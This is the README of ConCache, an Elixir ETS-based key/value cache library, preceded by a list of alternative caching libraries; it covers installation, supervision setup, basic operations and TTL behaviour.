Another way to do this instead of passing the ref as an argument, is to call the subroutine on the ref. As code tricks go, this can get fairly dangerous fairly quickly. So as an intention any ref you would like to be able to have this ability will need to be anointed..
The responsibility now lays in the subroutine. The subroutine will need to be house-trained. If you start feeding it all sorts of garbage, your carpets will look all sorts of messy. That is, the subroutine should be expecting the data it is receiving - of which it is the recipient.
sub iexpectanarraycontainingdataaboutaccuracy{
my $arrayref = shift;
## todo: not ideal example
## also align 0/9 with degugging levels
print {STDOUT} $arrayref->[0]," is quite accurate\n"
print {STDOUT} $arrayref->[9]," is deeply inaccurate\n"
return 1;
}
Another consequence of invoking a subroutine on a blessed reference, is that the reference can only call subroutines that exist within the same package. At least in this case, as only the reference has been blessed in the one-argument form of bless. Suffice to say, this prevents the problem of that newly blessed reference being able to call random subroutines from other loaded packages.
But to stress again, it may call any routines in the same namespace, so you should also be aware to write the other subroutines to fail correctly should they be called erroneously
#!perl
use 5.10.1;
use strict;
use warnings;
use Carp;
my @array_var = qw/Double, double toil and trouble;/;
say join "\n","\nfirst:", @array_var;
add_an_item( \ @array_var, $_ )
foreach qw/1234 abyzABYZ 4the5scottish6play 1when 2shall 3we 4three
+!/;
say join "\n","\nsecond: ",@array_var;
my $array_ref = \ @array_var;
bless $array_ref;
$array_ref->add_an_item( $_ )
foreach qw/1234 Fire burn, and cauldron bubble./;
say join "\n","\nthird: ", @array_var, "\nfourth: ", @$array_ref;
sub add_an_item{
say "\nsub args: ", join ' ', @_;
my $avref = shift;
my $item_to_add = shift;
# <STDIN> # use input module or this
$item_to_add =~ tr/a-zA-Z//cd;
$item_to_add || carp( "Skipping item.\nItems added to this array) ]
],
);
reorg($_,\%combinations)
foreach(keys %combinations);
sub reorg{
my($k,$h) = @_;
foreach my $combiset(@{$h->{$k}}){
my @uniquesets =
grep $_ =~ /\Aus/ keys %combinations;
my $num = scalar(@us);
foreach my $set ( @$combiset ){
$combinations{'us'.++$num } = $set
unless grep @$set {<~~>} @$_,
@combinations{@us};
# where {<~~>} is 'these arrays match'
# or the front N indices do or ...
}
}
[download]
To end up with something) ]
],
us1 => [ qw(one two three four five) ],
us2 => [ qw(one two three five seven) ],
us3 => [ qw(one one two three five) ],
);
[download]
While writing this example, I felt as though most of writing code is iterator definition. Within this example, I require several uses of iterator to define growing numbers of keys, these themselves need to be used to clarify the keys the initial map operation continues to apply the reorganising routine on the hash to. While also not then applying the new keys which have been added.
A kind of There's More Than One Way To Do What I Mean? I mean the iterator to know the keys I started with, and only iterate through them as the hash grows. I mean another iterator to build a set of unique values keyed in the original hash, and built out of the original keys values. I mean the newly built unique values to be used straight away in validation checks on the remaining keys.
If as here, I approach designing the code without considering what the internal behaviour of the iterator is, other than the existing definition that it should not be relied upon. The internal iteration behaviour may change between versions, and the code is easily maintained throughout minor transitions.
What I need from the iterator is that, a defined behaviour. If it is not of any impact as to the precise implementation, as the code is not well designed if it relies on that, then would it not be reasonable to approach implementation as a matter of cost and efficiency. What is the fastest, most cost effective implementation? Can that implementation be reasonably identified as being compatible for the next 15+ years. Can I access it and incant wizardry in the way I might with symbol tables. Such as by having a user defined operator.
Perhaps something more robust, like a Global Iterator Variable / Symbol, along the lines of ${*} or *INC,*ARGV, the match array $-[0..-1]. I don't want to be setting variables and flags in most cases. I want to have a simple concept of, don't rely on this behaviour, but this is how you can manipulate it if you want to. And consider maintainer is a must, will the code self
|
http://www.perlmonks.org/index.pl?node_id=847567
|
CC-MAIN-2015-22
|
refinedweb
| 771
| 59.33
|
Recently, while working on a project we needed a component in .Net which can encrypt/decrypt user password using Blowfish algorithm with a encryption key. We searched hard to get a ready made free .Net component to accomplish this task but found none! Finally we found a implementation hint from a article posted on igniterealtime. We took the blowfish.java file from Spark IM project and ported it to a .NET dll using ikvm, a jvm for .Net. We then referenced the dlls and used the encrypt and decrypt methods to do the required tasks.
using org.jivesoftware.util;
Blowfish algo = new Blowfish(encryptionKey);
string encryptedTxt = algo.encryptString("this is my test string");
string decryptedTxt = algo.decryptString(encrypted.
|
https://www.codeproject.com/Tips/235342/Blowfish-Encryption-Implementation-in-NET?fid=1643581&df=90&mpp=10&sort=Position&spc=None&tid=4175949
|
CC-MAIN-2017-39
|
refinedweb
| 118
| 61.43
|
Introduction to Functional Programming with Clojure
Most student programmers do not get introduced to functional programming beyond some extremely academic course using Standard ML that does not really showcase it as a practical programming style for real projects. It is rare that someone learns Haskell or OCaml or Lisp as their introduction to programming as opposed to something like C or Java, despite the fact that it is no more complicated and in my opinion a more intuitive way to think about computation in general. I hope to demonstrate that in reality, functional programming can be a great practical choice for almost any project and is absolutely worth the time it takes to learn and transition from more popular languages.
Why Clojure?
I am using Clojure to showcase these concepts because it was designed from the ground up to be practical above all else, and accomplishes that practicality by embracing functional programming. Furthermore, the language is very “opinionated,” in that all of its design decisions are core to the language, and writing in a non-idiomatic style is heavily discouraged throughout the design. You can look at Clojure’s official rationale for all of the details, but we will be exploring various aspects of it throughout this article.
Another benefit of Clojure its Lisp syntax. Although totally alien to some, it is absolutely worth the effort to learn and get used to. Lisp is a family of languages originating in the 1960s that all have similar prefix notation with heavy use of parenthesis, as you will see. The beauty of Lisp is that its code is just a data structure that the language can interpret natively, also known as being homoiconic. This means that the fundamental syntax in Lisp is extremely bare bones, and can be expanded by libraries and code. It’s a jarring transition, but with a good editor and some time, it becomes hard to go back. As usual, Xkcd puts it best:
Basic Syntax and Functions
The goal of this section isn’t to teach enough Clojure to actually use it, there are plenty of tutorials for that already, but to introduce enough to understand the core syntax and any examples that follow. This is by no means complete or absolutely thorough, but it is surprisingly close to being complete which is the beauty of Lisp. We will not touch at all on Java or the JVM though, which is a very useful aspect of Clojure but not relevant to this discussion. It may seem like a lot of information, but if you keep in mind a comparison to other more popular languages, you will see that the syntax is practically tiny, and the standard library is a fraction of the size while being extremely expressive, if a bit difficult to grasp at first.
The first thing to understand before going any further is data in Clojure, much like in many other functional languages, is immutable. This means that you cannot write something like a for loop which must inherently mutate an index variable. Immutability means you no longer think of code as a series of instructions that change various values, and instead, think of code as a series of functions applied on functions, i.e. a series of transformations on data. These transformations can of course have side-effects, like printing to a terminal, because otherwise your program wouldn’t do anything, but functions with side-effects tend to be kept isolated where possible since it makes code much easier to understand and work with.
The fundamental action of any functional programming is, unsurprisingly, function application. In most programming languages, this is done with parenthesis following the function name, e.g.
add(1,3) might return 4. Alternatively, it is common to use infix notation for binary functions, e.g.
1+3 will return 4 or
2 == 3 will return false. Infix usually has implicit operator precedence, so
1+2*3 is 7 whereas
(1+2)*3 is 9. In Lisp, all of that is thrown away, and instead function application is done in the form of a list, also called an s-expression when used for function applications or nested data, where the first element is the function and the following elements are its arguments. So the previous examples are, in order:
(+ 1 3),
(= 2 3),
(+ 1 (* 2 3)), and
(* (+ 1 2) 3). In exchange for absolutely no ambiguity in function application (among other benefits we will see later), you get lots of parenthesis, with function definitions sometimes ending in 10 or more closing brackets, but that is easy enough to ignore.
Now that 70% of the syntax is out of the way, we can look at the rest. First of all comments use the semicolon symbol. The parenthesis structure represents a linked list. In order to prevent the list from being treated as function application, you can either add a quote, or use the
list function:
'(1 2 3) or
(list 1 2 3). Alternatively if a quote is too much syntax the function
quote can be used instead:
(quote (1 2 3)). The difference between these two may not be clear at first, but the key is that the quote form prevents an s-expression from being treated as code, whereas list is just a function that takes values as an argument. These are generally not used unless trying to write code to modify other code, i.e. create your own syntax using macros. We will look at some examples of standard library macros shortly.
Instead of using lists to store sequential data, it is more common to use vectors (which are akin to
ArrayLists in Java) as follows:
[1 2 3]. Some examples of basic operations you would expect from a sequential data structure:
Note that in all cases commas to separate items are optional and normally excluded except in the case of long multi-line structures. The two other core data structures left in Clojure are the map (dictionary), and set. Maps are used to store key value pairs that can efficiently get a value given its key, and sets are a way to store a collection of values that are all unique. Both sets and maps can be stored in different ways internally, which can be controlled, but for our purposes we will not care about the difference between a hash set and sorted set (for example).
Clojure also includes all of the base data types you would expect, and a few more. There are strings, characters (denoted with a backslash
[\a \b \c] is a vector of 3 characters), integers, floats, and booleans. Conversions between types happen implicitly as Clojure heavily embraces polymorphism, so using a function like
first on a string returns a character. When converting to a boolean, every single value is considered truthy except for
nil and
false, including empty lists.
Clojure (and most Lisps) also support something called keywords, which are kind of like special strings used as keys in maps, denoted with a colon
:mykeyword. The reason they are used as keys in maps is because they are implicitly converted to a function for accessing that element in a map. For example,
(:a {:a "hi" :b "hello":c "hey"}) would return
"hi", but that would not work if the keys were something other than keywords.
The penultimate data type I am going to mention is one that has appeared a number of times already, and it is the symbol. Every function name we have seen so far like
first is just a symbol referencing that function. These are effectively like pointers in C, or better yet they can be thought of as variable names. Like keywords, they are strings with special meaning attached to them, and can be converted to strings with the
str function, and the other way around with the
symbol function. By default, anytime you use a symbol, it will get replaced by the thing it references, which is why these functions actually do something. In order to prevent that and actually work with the symbols (which is something you rarely need to do), the quote macro is used just like with lists, e.g.
'first or
(quote first).
Finally and perhaps most importantly, there are functions. These are created using the
fn macro, which takes a vector of symbols, which are the functions inputs, and then an s-expression that uses those symbols to do something. Note that
fn itself is not a function per se, but a macro, meaning it takes all of its arguments as a data structure and operates on that code directly, which is why you can use variables inside the expression without them being directly evaluated. This happens at compile time, so all of these macros that are everywhere in Lisp will rearrange your code before the compiler sees it. This is a somewhat strange concept outside of Lisp, but it is how most more complex libraries are built up into programmer friendly interfaces, and how complex concepts can be expressed in such a bare bones syntax. It is like a much more powerful version of C preprocessor macros, made possible thanks to Lisp’s homoiconicity. Conceptually this may be a bit confusing, but in practice its extremely simple and looks the same as using any old function, so let’s see some examples.
Notice the consistency of the syntax here: it does not matter whether a function is named or not, putting it as the first element of an s-expression applies it regardless. That is what makes Lisp so great, it is fundamentally so simple (to paraphrase Clojure’s creator Rich Hickey, “simple but not necessarily easy”) that everything works exactly as you expect.
The last remaining thing to point out is that you can globally bind data (which includes functions) to a symbol using
def. There are also ways to locally bind symbols (namely let binding) but we won’t concern ourselves with that for now. The
defn macro combines
def and
fn into one form since defining functions is done so often.
Functional Programming
The key difference in all of this syntax compared to more common languages is that there is no idiomatic way to do one action followed by another, since data is immutable (there are constructs in the language to do that, specifically for handling functions with side effects like
println ). Instead, programming should be thought of as a series of transformations of data. Lets say you want to double every element in an array. In a language like C, you would write a for loop that goes through each element of the array and multiplies it by 2, and then modifying the array with the result. If you then later use that array in some function, you must keep in your head as the programmer that at some time during the programs execution, that array’s meaning and value changed. Furthermore, in the process, a new variable needed to be declared to keep track of the current iteration in the loop. Sure, it has no performance impact and can be easily optimized away, but it’s extra code that does not have anything to do with the programmers actual goal.
Clojure (and basically every functional language) has a function called
map that takes as input a function that takes 1 parameter, and a list. It then returns a list with that function applied to every element of the input list. Let’s see the Clojure version of the above code. Note that it is assumed that all of this code is put into the Clojure REPL (Read-Eval-Print Loop, much like the one python has, as well as terminals like Bash), since normally Clojure code is not just run sequentially like an imperative language would be.
map is a much weaker operation than the for loop, which is exactly why its so great. It inherently encodes the idea of taking an operation and using it identically on every element of a sequence, which is one of the most common uses of a loop anyway.
If you look back, you may notice that the operation of multiplying every element of an array by 2 could be made parallel easily, since no part of the computation depends on another. In fact, the
map function in general satisfies that same property. Therefore, Clojure has a function called
pmap, which is exactly like
map but runs in parallel (this includes some overhead for collating all of the results together, so it runs slower on small lists). The above code can be parallelized with exactly one character due to the nature of the transformation we wanted to perform! For loops on the other hand could potentially depend on former results because they are stateful, so any attempt at parallelization will likely be somewhat more complex.
Constraining the amount you can do with a single function or construct is core to what makes functional programming practical. Complicated algorithms get reduced down to something where each step is mostly self explanatory. It’s all about how the data gets manipulated, rather than manipulating the data. Of course every once in a while state may actually be the easiest way to solve a problem, and Clojure provides ways to handle that (e.g. atoms, which can be very helpful for complex concurrent programs) if you need it, it’s just that you usually don’t need it. In fact, just to keep you honest, every single standard library function that involves state in any way ends with a ‘!’ to help avoid bugs that so often come with using stateful functions.
Of course, if programming should be thought of as a series of transformations, then there should be a good way to do many transformations in a row that isn’t as ugly or painful to read as just repeated function application. To that end, I want to introduce a fun little set of macros included in the standard library called threading macros, of which there are a handful that are all fundamentally the same. We will just look at the simplest one, which is called thread last, and written as
->> . It doesn’t actually do anything special, or provide you with more power, but it does provide you with “new syntax” as it effectively rearranges your code before the compiler sees it, allowing you as the programmer to read and write code that best represents the actual intention behind the code without being trapped by the very specific structure a simple Lisp program might have.
->> takes as its first input some data, and then every other input is an s-expression. The macro will then rearrange the code (BEFORE the s-expressions get evaluated) such that the initial piece of data gets put as the last argument of the next s-expression, and the result of that gets put into the last argument of the next one, etc. It is best understood with an example:
Both of these functions are exactly identical, they just take a list of lists, where each sub list represents an item and its cost, and return the total tax (assuming 20% tax rate) on all of the items. It just takes the second element of each list, thereby transforming a list of lists into a single list, then multiplies every number by 0.2, and then sums them (apply just turns a function that takes multiple arguments like +, and turns it into a function that takes a single argument that is a list). The big difference is that the bottom one is much more readable, and effectively represents the exact process going through my head as I was writing the algorithm, whereas the first version requires reading bottom to top, right to left, which is unnatural both to read and to write. Being able to make decisions about syntax like that is the power of Lisp macros.
Let’s look at a more complex example, using some functions that have yet to be introduced. Merge sort seems like a nice place to start, since it is an extremely common algorithm used everywhere, that is especially efficient with linked lists which are commonly used in Clojure. For those unfamiliar with merge sort, it is a sorting algorithm with O(nlogn) asymptotic time complexity that works by using a subroutine that takes two already sorted lists and merges them together into a single sorted list. The input list is split in half, and then each half is sorted by merge sort (recursively), and then those two sorted lists are merged again. When reading the example, make sure to pay attention to indentation more so than then parenthesis, since it is much easier to read that way. The many levels of nesting in Lisp style braces can mostly be ignored if the code is formatted sensibly which most sane people will do.
This example includes plenty of functions from the standard library that have yet to be introduced, but should be simple to understand by their name alone. This example also introduces a feature common in functional programming called parameter deconstructing which allows you to express a data structure parameter in terms of its components. In this case, the function
mrg takes three lists as a parameter,
X
Y and
R but the first two lists are separated into the first element (
x and
y respectively) and a list of remaining elements (
xrest and
yrest ). This is just a shorthand that makes code much easier to read and understand, as well as putting an emphasis on the structure and processing of data as opposed to the algorithm itself!
The
mrg function assumes that
X and
Y are both sorted, so it works by separating out the first element of each and checking which one is smallest. It then recursively calls itself with the same inputs except the smallest element has been removed from the corresponding list and added onto the result list. It effectively is going through and picking off the smallest elements of each list and adding them into a result, and when one of the lists is empty it just puts the remaining list onto the result and returns that. Fundamentally a very simple algorithm, but implemented quite differently than you might using C++ where you would need to constantly keep track of where in each list you are, and modify a results variable constantly.
mrg avoids having state by having more parameters, thereby maintaining its purity as a function. This means you can really easily test the function just by popping open a REPL and running
mrg with whatever parameters and ‘state’ you want.
mrgsort then just splits its input list in half, then runs
mrg on each half after sorting those recursively, and will just return a length 0 or 1 list as is since they are already sorted.
Notice how Clojure uses functions like
split-at and
count that can affect practically any collection in Clojure. It can be used on lists, strings, and maps polymorphically in a way that just makes sense and is simple, whereas in an object oriented language you would see functions like
split be part of the string class and will only work on strings or classes derived from strings. The simplicity of datastructures in Clojure grants polymorphism for free. In fact, this merge sort function will work on any list, vector, or even set of numbers, noting that the set and vector will be turned into a list (although they can easily be returned back into a set or vector with the
into function). If the
<= function used in
mrg (which is only valid for numbers) is replaced with the
compare function, then our sort will work with any core Clojure data structure (including hash maps which implicitly convert to a list of length 2 vectors) containing any comparable data type such as strings and vectors. All of that polymorphism comes basically for free because every data structure in Clojure is just built off of the basic few, so any function that applies to the core data structures will also apply to any of your own without writing any boiler plate or even thinking about it very much.
To really appreciate how much nicer it is to write in a functional style ultimately requires actually trying it yourself. To that end, I highly recommend spending some time learning Clojure or some other functional language properly, and maybe even consider using it for your next project. It’s absolutely worth the learning curve and really provides a unique perspective on designing systems. Here are a few resources to get started if you wish to learn more. Furthermore, Rich Hickey, Clojure’s creator, gives plenty of great talks (and writes great articles) on the design of the language that are absolutely worth looking at.
|
https://medium.com/hackers-at-cambridge/introduction-to-functional-programming-with-clojure-af1ad582010d?source=---------0
|
CC-MAIN-2019-51
|
refinedweb
| 3,481
| 53.95
|
This site uses strictly necessary cookies. More Information
I have seen many other post about this but i just cannot seem to get it to work. I'm trying to use unity's HandHeldCam script as my main camera. I have made the variables that i want to change in the HandHeldCam script to public, what i want to do is make it so that when the player has under a certain health the camera starts to sway slightly more. I am able to do all the rest myself but i just cam seem to get the m_SwaySpeed over to my other script
namespace UnityStandardAssets.Cameras
{
public class HandHeldCam : LookatTarget
{
public float m_SwaySpeed = .5f;
public float m_BaseSwayAmount = .5f;
I need to access these variables from this script
public Camera Cam;
public float playerHealth;
void Start () {
playerHealth = 100;
Cam = GetComponent<Camera>();
}
Using things like public HandHeldCam Sway; don't seem to work If anyone can help that would be amazing.
public HandHeldCam Sway;
Hi Lewis_Games, I went in and modified the HandHeldCam script to give myself public getters and setters for its private variables.
using System;
using UnityEngine;
namespace UnityStandardAssets.Cameras
{
public class HandHeldCam : LookatTarget
{
[SerializeField] private float m_SwaySpeed = .5f;
[SerializeField] private float m_BaseSwayAmount = .5f;
[SerializeField] private float m_TrackingSwayAmount = .5f;
[Range(-1, 1)] [SerializeField] private float m_TrackingBias = 0;
// ...
#region getters
public float getSwaySpeed() {
return this.m_SwaySpeed;
}
public float getBaseSwayAmount() {
return this.m_BaseSwayAmount;
}
public float getTrackingSwayAmount() {
return this.m_TrackingSwayAmount;
}
public float getTrackingBias() {
return this.m_TrackingBias;
}
#endregion
#region setters
public void setSwaySpeed(float value) {
this.m_SwaySpeed = value;
}
public void setBaseSwayAmount(float value) {
this.m_BaseSwayAmount = value;
}
public void setTrackingSwayAmount(float value) {
this.m_TrackingSwayAmount = value;
}
public void setTrackingBias(float value) {
if (value < -1f) {
value = -1f;
}
if (value > 1f) {
value = 1f;
}
this.m_TrackingBias = value;
}
#endregion
}
}
I then included a using statement at the top of the script that needed to access it.
using UnityEngine;
using System.Collections;
using UnityStandardAssets.Cameras;
// If this script is on the same GameObject as HandHeldCam
// [RequireComponent(typeof(HandHeldCam))]
public class HandHeldAccess : $$anonymous$$onoBehaviour {
private HandHeldCam hhc;
void Awake() {
// If this script is on the same GameObject as HandHeldCam
// hhc = GetComponent<HandHeldCam> ();
hhc = Camera.main.GetComponent<HandHeldCam>();
}
void Start() {
Debug.Log("base sway before: " + hhc.getBaseSwayAmount());
Debug.Log ("sway speed before: " + hhc.getSwaySpeed());
Debug.Log ("tracking bias before: " + hhc.getTrackingBias());
Debug.Log ("tracking sway amount before: " + hhc.getTrackingSwayAmount());
hhc.setBaseSwayAmount (1.5f);
hhc.setSwaySpeed (2.75f);
hhc.setTrackingBias (3.825f);
hhc.setTrackingSwayAmount (5);
Debug.Log("base sway after: " + hhc.getBaseSwayAmount());
Debug.Log ("sway speed after: " + hhc.getSwaySpeed());
Debug.Log ("tracking bias after: " + hhc.getTrackingBias());
Debug.Log ("tracking sway amount after: " + hhc.getTrackingSwayAmount());
}
}
Doing that gets me this error NullReferenceException: Object reference not set to an instance of an object HandHeldAccess.Awake () (at Assets/HandHeldAccess.cs:9) Not sure if it has to do with the camera being a child of the object with the health script but i cant seem to get it to work. For some reason i remember an easier way of doing this.
Thanks for the help
Never mind thanks for the help i managed to fix it. Forgot to set the camera as the main cam.
Still feel like there is an easier way to do this buy using getcomponentinchildren or something but i can't remember.
Thanks for the help Lewis
Answer by Lewis_Game
·
Apr 30, 2016 at 01:35 AM
I was able to find the best way to get the script from the other gameobject. Something that i realized that I completely forgot was to get the game object, public gameobject other; This made it so that the script could be found. This was my mistake, but thanks for the help anyway.
public gameobject other;
Answer by dandelo99
·
Apr 28, 2016 at 09:08 AM
try this Cam.GetComponent(Camera).m_SwaySpeed; instead of this line Cam = GetComponent();
You can change variable with this for example;
if (something)
{
Cam.GetComponent<Camera>().m_SwaySpeed =!!! NullReferenceException: Object reference not set to an instance of an object
2
Answers
C# Unity dot syntax exercise correct solution?
1
Answer
Access script based on which one is active
2
Answers
How do i change a variable from one Class to another Class?
0
Answers
C# Get Highest variable name
2
Answers
EnterpriseSocial Q&A
|
https://answers.unity.com/questions/1177818/how-can-i-access-variables-from-other-scripts-c.html
|
CC-MAIN-2021-25
|
refinedweb
| 702
| 50.33
|
LCM [Least Common Multiple] Tutorial
LCM [Least Common Multiple] Tutorial
Let's get started! 😉
Function
I recommend you put all this code I'm going to teach you in a function like this:
def LCM(n, m): # n and m are just any numbers # code here
First do that.
Logic time!
So...most of you should know how to find the LCM between 2 numbers. If you don't, I'll teach you.
Prime factorization
You need to do prime factorization of the numbers you are going to do the LCM for(if you don't know how to do prime factorization, then too bad. XD). Remember use the exponent way, like
2^3*4^2 (note that ^ is to the power of), don't do
2*2*2*4*4.
After you did that, you need to find the greatest exponent for the same base. (base is like 2^3, 2 is the base, 3 is the exponent) Do this for each individual base. If you come to a situation where you have like a 5^2, but the other number does not have that prime factor, then you just choose that one.
Finally, multiply all the ones you chose. That's it.
Here's a example to help you.
What is the LCM(12, 40)?
First, we need to do the prime factorization.
12 = 2^2 * 3^1 and
40 = 2^3 * 5^1.
12 = 2^2 * 3^1 40 = 2^3 * 5^1
We see that
2^3 is greater than
2^2. But, there is no other number with 3 except 3^1, the same with 5. So you multiply it directly.
2^3 * 3^1 * 5^1 = 120. That's the answer
But that doesn't have anything to do with this tutorial!
🤣
This tutorial is much easier and simpler.
Getting started (finally)
Logic
We need to know which one is the greatest so we can add continuously adding to it until it is divisible by the other number. We can do that by:
def LCM(n, m): global y # make it a global variable y = n # I had to define y so here you go if n < m: # if n is less than m while y < n*m: # y has to be less than the product of the numbers you want to find LCM of. y += n # keep adding n to the value of y if y % m == 0: # every loop check if when y divided by the other number (in this case it is m), the remainder is 0 which means it could be evenly divided by it. print(y) # if this event occurs, than print the LCM break # exit the loop # same thing but just opposite elif m < n: while y < n*m: y += m if y % n == 0: print(y) break
To use the program, simply do
LCM(4,5) # call the function with the parameters
You could also add things to the program like colors, etc.
Note that if the number is too big, the program will return an error, so you might want to add some
try and
except to it.
That's it everyone! Bai!🤗
Voters
|
https://replit.com/talk/learn/LCM-Least-Common-Multiple-Tutorial/127083
|
CC-MAIN-2021-17
|
refinedweb
| 528
| 77.98
|
Assuming a Role
You must designate a separate IAM user to assume each role you've created in each account, and ensure that each IAM user has appropriate permissions.
IAM Users and Roles
After you have created the necessary roles and policies in Account A for scenarios 1 and 2, you must designate an IAM user in each of the accounts B, C, and Z. Each IAM user will programmatically assume the appropriate role to access the log files. That is, the user in account B will assume the role created for account B, the user in account C will assume the role created for account C, and the user in account Z will assume the role created for account Z. When a user assumes a role, AWS returns temporary security credentials that can be used to make requests to list, retrieve, copy, or delete the log files depending on the permissions granted by the access policy associated with the role.
For more information about working with IAM users, see Working with IAM Users and Groups .
The primary difference between scenarios 1 and 2 is in the access policy that you create for each IAM role in each scenario.
In scenario 1, the access policies for accounts B and C limit each account to reading only its own log files. For more information, see Creating an Access Policy to Grant Access to Accounts You Own.
In scenario 2, the access policy for Account Z allows it to read all the log files that are aggregated in the Amazon S3 bucket. For more information, see Creating an Access Policy to Grant Access to a Third Party .
Creating permissions policies for IAM users
To perform the actions permitted by the roles, the IAM user must have permission
to call the AWS STS
AssumeRole
API. You must edit the user-based policy for each
IAM user to grant them the appropriate permissions. That is, you set a Resource
element in the policy that is attached to the IAM user. The following example shows
a policy for an
IAM user in Account B that allows the user to assume a role named "Test" created earlier
by
Account A.
To attach the required policy to the IAM role
Sign in to the AWS Management Console and open the IAM console.
Choose the user whose permissions you want to modify.
Choose the Permissions tab.
Choose Custom Policy.
Choose Use the policy editor to customize your own set of permissions.
Type a name for the policy.
Copy the following policy into the space provided for the policy document.
{ "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Action": ["sts:AssumeRole"], "Resource": "arn:aws:iam::
account-A-id:role/Test" } ] }
Important
Only IAM users can assume a role. If you attempt to use AWS root account credentials to assume a role, access will be denied.
Calling AssumeRole
A user in accounts B, C, or Z can assume a role by creating an application that calls
the
AWS STS
AssumeRole
API and passes the role session name, the Amazon Resource Number (ARN) of the role
to
assume, and an optional external ID. The role session name is defined by Account A
when
it creates the role to assume. The external ID, if any, is defined by Account Z and
passed to Account A for inclusion during role creation. For more information, see
How to Use an External
ID When Granting Access to Your AWS Resources to a Third Party in the
IAM User Guide. You can retrieve the ARN from the Account A
by opening the IAM console.
To find the ARN Value in Account A with the IAM console
Choose Roles
Choose the role you want to examine.
Look for the Role ARN in the Summary section.
The AssumeRole API returns temporary credentials that a user in accounts B, C, or Z can use to access resources in Account A. In this example, the resources you want to access are the Amazon S3 bucket and the log files that the bucket contains. The temporary credentials have the permissions that you defined in the role access policy.
The following Python example (using the
AWS SDK for Python (Boto))
shows how to call
AssumeRole and how to use the
temporary security credentials returned to list all Amazon S3 buckets controlled by
Account
A.
import boto from boto.sts import STSConnection from boto.s3.connection import S3Connection # The calls to AWS STS AssumeRole must be signed using the access key ID and secret # access key of an IAM user or using existing temporary credentials. (You cannot call # AssumeRole using the access key for an account.) The credentials can be in # environment variables or in a configuration file and will be discovered automatically # by the STSConnection() function. For more information, see the Python SDK # documentation: sts_connection = STSConnection() assumedRoleObject = sts_connection.assume_role( role_arn="arn:aws:iam::
account-of-role-to-assume:role/
name-of-role", role_session_name="AssumeRoleSession1" ) # Use the temporary credentials returned by AssumeRole to call Amazon S3 # and list the bucket in the account that owns the role (the trusting account) s3_connection = S3Connection( aws_access_key_id=assumedRoleObject.credentials.access_key, aws_secret_access_key=assumedRoleObject.credentials.secret_key, security_token=assumedRoleObject.credentials.session_token ) bucket = s3_connection.get_bucket(
bucketname) print bucket.name
|
https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-sharing-logs-assume-role.html
|
CC-MAIN-2018-13
|
refinedweb
| 867
| 52.29
|
Here is the trick (well documented on the matplotlib webpage) to define the font family and size of what appears on your matplotlib plot:
Before calling anything related to matplotlib in your script, do:
### rcParams are the default.
Calling these lines before creating a basemap plot will also work !
Note: you can permanently define the default values if you *really* prefer Comic Sans Ms for all your plots, e.g. The matplotlibrc file is located somewhere on your disk, to know where, just type:
import matplotlib print matplotlib.matplotlib_fname()
gives : “c:\Python26\lib\site-packages\matplotlib\mpl-data\matplotlibrc”
which starts with :
### MATPLOTLIBRC FORMAT # This is a sample matplotlib configuration file - you can find a copy # of it on your system in # site-packages/matplotlib/mpl-data/matplotlibrc. If you edit it # there, please note that it will be overridden in your next install. # If you want to keep a permanent local copy that will not be # over-written, place it in HOME/.matplotlib/matplotlibrc (unix/linux # like systems) and C:\Documents and Settings\yourname\.matplotlib # (win32 systems).
Quite easy to understand, isn’t it ?
More information about Customizing Matplotlib can be found here.
One thought on “Matplotlib Fonts (plots, basemaps, etc.)”
|
https://www.geophysique.be/2010/12/07/matplotlib-fonts-plots-basemaps/
|
CC-MAIN-2020-50
|
refinedweb
| 202
| 56.35
|
An unnamed namespace can be used to ensure names have internal linkage (can only be referred to by the current translation unit). Such a namespace is defined in the same way as any other namespace, but without the name:
namespace { int foo = 42; }
foo is only visible in the translation unit in which it appears.
It is recommended to never use unnamed namespaces in header files as this gives a version of the content for every translation unit it is included in. This is especially important if you define non-const globals.
// foo.h namespace { std::string globalString; } // 1.cpp #include "foo.h" //< Generates unnamed_namespace{1.cpp}::globalString ... globalString = "Initialize"; // 2.cpp #include "foo.h" //< Generates unnamed_namespace{2.cpp}::globalString ... std::cout << globalString; //< Will always print the empty string
|
https://riptutorial.com/cplusplus/example/4851/unnamed-anonymous-namespaces
|
CC-MAIN-2021-43
|
refinedweb
| 129
| 52.36
|
con_cache alternatives and similar packages
Based on the "Caching" category.
Alternatively, view con_cache alternatives based on common mentions on social networks and blogs.
cachex9.6 5.2 con_cache VS cachexA powerful caching library for Elixir with support for transactions, fallbacks and expirations
Nebulex9.2 7.5 con_cache VS NebulexIn-memory and distributed caching toolkit for Elixir.
locker9.1 0.0 con_cache VS lockerAtomic distributed "check and set" for short-lived keys
lru_cache5.6 0.0 con_cache VS lru_cacheETS-based fix-sized LRU cache for elixir
stash5.1 0.0 con_cache VS stashA small and user-friendly ETS wrapper for caching in Elixir
gen_spoxy4.7 0.0 con_cache VS gen_spoxy**DEPRECATED** caching made fun!
Mem3.8 0.0 con_cache VS MemKV cache with TTL, Replacement and Persistence support
jc3.5 0.0 con_cache VS jcErlang, in-memory distributable cache
elixir_locker2.9 0.0 con_cache VS elixir_lockerLocker is an Elixir wrapper for the locker Erlang library that provides some useful libraries that should make using locker a bit easier.
Haphazard2.5 0.0 con_cache VS HaphazardA configurable plug for caching
Do you think we are missing an alternative of con_cache or a related project?
README
ConCache
ConCache (Concurrent Cache) is an ETS based key/value storage with following additional features:
- row level synchronized writes (inserts, read/modify/write updates, deletes)
- TTL support
- modification callbacks
Usage in OTP applications
Setup project and app dependency in your
mix.exs:
... defp deps do [{:con_cache, "~> 0.13"}, ...] end def application do [applications: [:con_cache, ...], ...] end ...
A cache can be started using
ConCache.start or
ConCache.start_link functions. Both functions take two arguments - the first one being a list of ConCache options, and the second one a list of GenServer options for the process being started.
Typically you want to start the cache from a supervisor:
Supervisor.start_link( [ ... {ConCache, [name: :my_cache, ttl_check_interval: false]} ... ], ... )
For OTP apps, you can generally find this in
lib/<myapp>.ex. In the Phoenix web framework, look in the
start function and add the worker to the
children list.
Notice the
name: :my_cache option. The resulting process will be registered under this alias. Now you can use the cache as follows:
